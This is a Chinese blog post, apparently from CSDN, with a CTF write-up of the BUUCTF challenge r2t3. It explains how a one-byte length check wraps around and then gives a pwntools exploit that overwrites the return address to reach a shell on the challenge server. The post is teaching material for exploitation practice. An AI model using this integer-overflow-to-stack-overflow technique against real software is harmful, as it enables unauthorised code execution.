整形溢出

最新推荐文章于 2023-03-19 18:38:25 发布
最新推荐文章于 2023-03-19 18:38:25 发布
阅读量480 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/YangZiTrick/article/details/110010626
版权

[BJDCTF 2nd]r2t3

来自buuctf

先看ida

在这里插入图片描述

buf缓冲区大小为408h,而read读取大小为400h,比buf要小,所以不能进行简单的缓冲区栈溢出。

再看name_check函数,v3是int8类型的变量,1111 1111 = 0xFF = 255。当0xFF +1的时侯,变量发生整形溢出,0x100 = 256 此时v3的数值为零(0000 0000),但是这只是显示了一个字节,其实再计算机里面会溢出,前面会进行进位操作变成 1 0000 0000。

同时还要满足3< v3 <8 的条件,这时候可以确定溢出数值是在 0x104~0x107 中

在这里插入图片描述

后面的strcpy()函数将s复制给dest,看到dest的偏移为0x11+4

程序中给出了/bin/sh的地址

exp:

from pwn import *
#context.log_level = 'debug'
r=remote('node3.buuoj.cn',26213)
sys_addr = 0x08048594
payload = 'a' * (0x15) + p32(sys_addr) + 'a' * (0x104-0x19) # 0x15 + 0x4 + n = 0x104 
print(len(payload))
r.recvuntil('name:\n')
r.sendline(payload)
r.interactive()

Int8, 等于Byte, 占1个字节.

Int16, 等于short, 占2个字节. -32768 32767

Int32, 等于int, 占4个字节. -2147483648 2147483647

Int64, 等于long, 占8个字节. -9223372036854775808 9223372036854775807

这样, 看起来比short,int,long更加直观些!

另外, 还有一个Byte, 它等于byte, 0 - 255.

所以说这里的v3是占一个字节的,一个字节是由8位二进制决定的。

例如:0000 0000 就是一个字节,代表0,1111 1111 也是一个字节,代表255.

参考1
参考2

_Trick_
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
C语言的整型溢出问题
wuyangyang555的博客
10-03 3107
整型溢出有点老生常谈了,bla, bla, bla… 但似乎没有引起多少人的重视。整型溢出会有可能导致缓冲区溢出,缓冲区溢出会导致各种黑客攻击,比如最近OpenSSL的heartbleed事件,就是一个buffer overread的事件。在这里写下这篇文章,希望大家都了解一下整型溢出,编译器的行为,以及如何防范,以写出更安全的代码。
整型数据的溢出
11-23
整型数据的溢出说明。介绍了C语言中关于整型数据溢出的相关知识,适合于初学者的理解应用。
整型溢出
零丁若叹
04-27 4411
1.当数据超出了类型的最值或者有符号数被解析成无符号数时,可能会发生溢出。整型溢出的形式有:1.存储溢出2.运算溢出3.符号导致的溢出 对于存储溢出,加入int m=0x1000;char n=m;printf(“%d\n”,n)  结果会输出0,因为m占据4个字节的存储空间,而n占有一个,m赋值给n时,仅仅把最低字节给了n。对于运算溢出,假如unsignedchar a=255;unsigne
整型的溢出详解
gao_zhennan的博客
10-13 8544
前言:本文介绍的整型的溢出并不针对某种编程语言,通过数在机器中存储的方式,说明为什么会存在溢出以及溢出后数的实际存储情况。 一、什么是溢出(理解即可) 当我们在计算机中要存储的数超出了该类型数可以表示的范围就会发生溢出。例如,Java中的byte类型数据范围为[-128,127],你想要存储的数为128,此时会发生上溢;要存储的数为-129,此时会发生下溢。其核心思想是超出可以表示的范围。就像向杯子中倒水,水超出了杯子的容量,就会溢出来。 二、为什么会发生溢出 前文已经有所介绍:超出了可以表示的范围。 .
整数溢出
AlexTiger0的专栏
12-01 631
<br />  首先要明白无符号整数是不会溢出的 ,那么怎么判断整数溢出?<br />  <limits.h> INT_MAX <br />   if(a + b > INT_MAX) 那么就说明它溢出
检查整形溢出的计算器
06-23
一个检查Int类型运算时是否溢出的代码,再送一个生成从1到n的全排列的代码,够意思吧,还0积分就可下载!!!我叫Jacket
缓冲取溢出攻击原理案例
10-19
黑客就是通过改变地址来攻击他人的程序的。这乃中科院视频,有助于提高对C++的理解和认识。
整形数据的溢出文本文件
06-26
整形数据的溢出文本文件
整形数据的溢出.c源文件
06-26
整形数据的溢出.c源文件
整型溢出漏洞
热门推荐
ATFWUS的博客
03-02 2万+
目录 0x01.整型在计算机系统中的相关知识 0x02. 上界溢出和下界溢出 上界溢出: 下界溢出: 0x03.漏洞利用 0x01.整型在计算机系统中的相关知识 在计算机中,整数类型分为无符号整数和有符号整数 两种。 有符号整数会在最高位用0表示正数,1表示负 数,而无符号整数则没有这种规则。因为计算机只认得二进制,认不得符号。 无符号的汇编代码是对内存进行加法运算. 在计算机...
C编程语言中整型数据的溢出问题
liitdar的博客
08-21 9653
1)当前编译器为int类型数据分配了4个字节(对应32比特位),所以有符号int类型变量a和b的取值范围是“-2147483648”到“2147483647”,所以当a取值。b: 1000 0000 0000 0000 0000 0000 0000 0000(共32位)2147483647,再加1时,就会出现“溢出”的情况,其结果b发生了反转,变成了。上述是a、b的二进制补码形式(计算机中存储的都是二进制的补码形式)。2)从b的十进制数值以及二进制补码形式可以知道,最高位1。
Redis整形溢出漏洞(CVE-2021-32761)及修复脚本
淡定波的博客
07-23 4513
一、漏洞情况说明 Redis整形溢出漏洞(CVE-2021-32761): Redis是世界范围内应用广泛的内存型高速键值对数据库。 攻击者通过BIT命令与proto-max-bulk-len配置参数结合的情况下,可攻击运行在32位的系统中的32位的Redis程序,该漏洞能够造成整形溢出,并最终导致远程代码执行。 二、影响范围 Redis整形溢出漏洞影响版本: 2.2 < Redis Redis < 5.0.13 2.2 < Redis Redis < 6.0.15 2.2 <
个人对整形数据溢出,以及整形数据存储结构和范围的理解
weixin_41587767的博客
10-17 260
以下以8位为例。 第一点,首先内存全0表示实际意义的0是确定了,原因可能是为了和bool等其他类型相转换等等。 第二点,二进制内存的+-运算像滚筒一样是连贯的,全0再-1,就变成了全1,全1再+1,就变成了0(不知道从哪借的位),0就和1111 1111连接起来形成滚筒型了。 第三点,对于signed类型,为了正负数大约各一半,以8位为例,就以相邻的0111 1111(最大正数)和1000 ...
西普CTF训练(溢出
技术学习人生
06-27 3732
1、加减乘除 http://ctf1.simplexue.com/overflow/1/ 给定一段汇编代码,求shellcode linux下编写c代码void main() { asm( "_start:\n\t" "jmp test1\n\t" "test2:\n\t" "pop %ebx\n\t"
C语言中的整型溢出
qq_45286980的博客
03-19 1068
整型溢出指的是整型变量在进行赋值或者运算时,得到的结果超过了其取值范围从而发生截断,导致结果和预期不符的现象整型溢出也分为无符号和有符号的溢出或者可以分为上溢出overflow或者下溢出underflow对于unsigned整型溢出,C的规范是有定义的,“溢出后的数会以2^(8*sizeof(type))作模运算”,也就是说,如果一个unsigned char(1字符,8bits)溢出了,会把溢出的值与256求模上面的代码会输出:0 (因为0xff + 1是256,与2^8求模后就是0)
二进制漏洞原理--整型溢出漏洞
qq_40410406的博客
11-13 1118
1
整数溢出漏洞
fa1c4的blog
02-01 1250
整数溢出 溢出 有符号数才会溢出, 通常分为上溢和下溢, OF可以检测溢出 回绕 无符号数0-1会从最小数变成最大数, 反之同理, CF可以检测回绕 截断 较大宽度的数存入小宽度的操作数里, 高位会截断 漏洞多发函数 size_t 类型: 0-255(单字节无符号整数) memcpy() strlen() strncpy() malloc() 漏洞利用 (1) 整数转换 攻击者给len赋值一个负数, 可以绕过if检测, memcpy()第三个参数是size_t, 负数会自动转成正数导致栈溢出 (2)
[BJDCTF 2nd]r2t3 (整型溢出
qq_45691294的博客
12-16 173
进入到题目环境,程序接收一个输入,测试之后,发现输入任何值的返回都是Oops,u name is too long! checksec查看一下程序保护,只开启了NX 那就用IDA分析一下程序,将输入读取到buf的内存当中,又作为name_check函数的参数 进入到name_check函数里,存在一个判断,如果参数的长度大于3且小于等于8,则将s的值复制到dest的内存空间里。 分析之后,当通过条件判断之后,变量dest可以造成栈溢出 这里也存在整数溢出,v3的类型为unsigned __int8是一
c语言代码短整形变量的溢出
最新发布
06-07
当一个 short 类型的变量超出了其数据类型的最大值时,就会发生短整型变量的溢出。这会导致变量的值从最大值变成最小值,这种现象被称为“循环溢出”或“环绕溢出”。 例如,对于一个有符号的 short 类型的变量,其最大值为32767,如果我们将其加1,它的值将变为-32768,这就是短整型变量的溢出。 下面是一个简单的 C 代码示例,演示了短整型变量的溢出: ```c #include <stdio.h> int main() { short num = 32767; num = num + 1; printf("num = %d\n", num); return 0; } ``` 上述代码将输出 "num = -32768",因为在短整型变量超出其最大值时,它的值将变成最小值。在编写代码时,我们应该格外小心,避免短整型变量的溢出
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值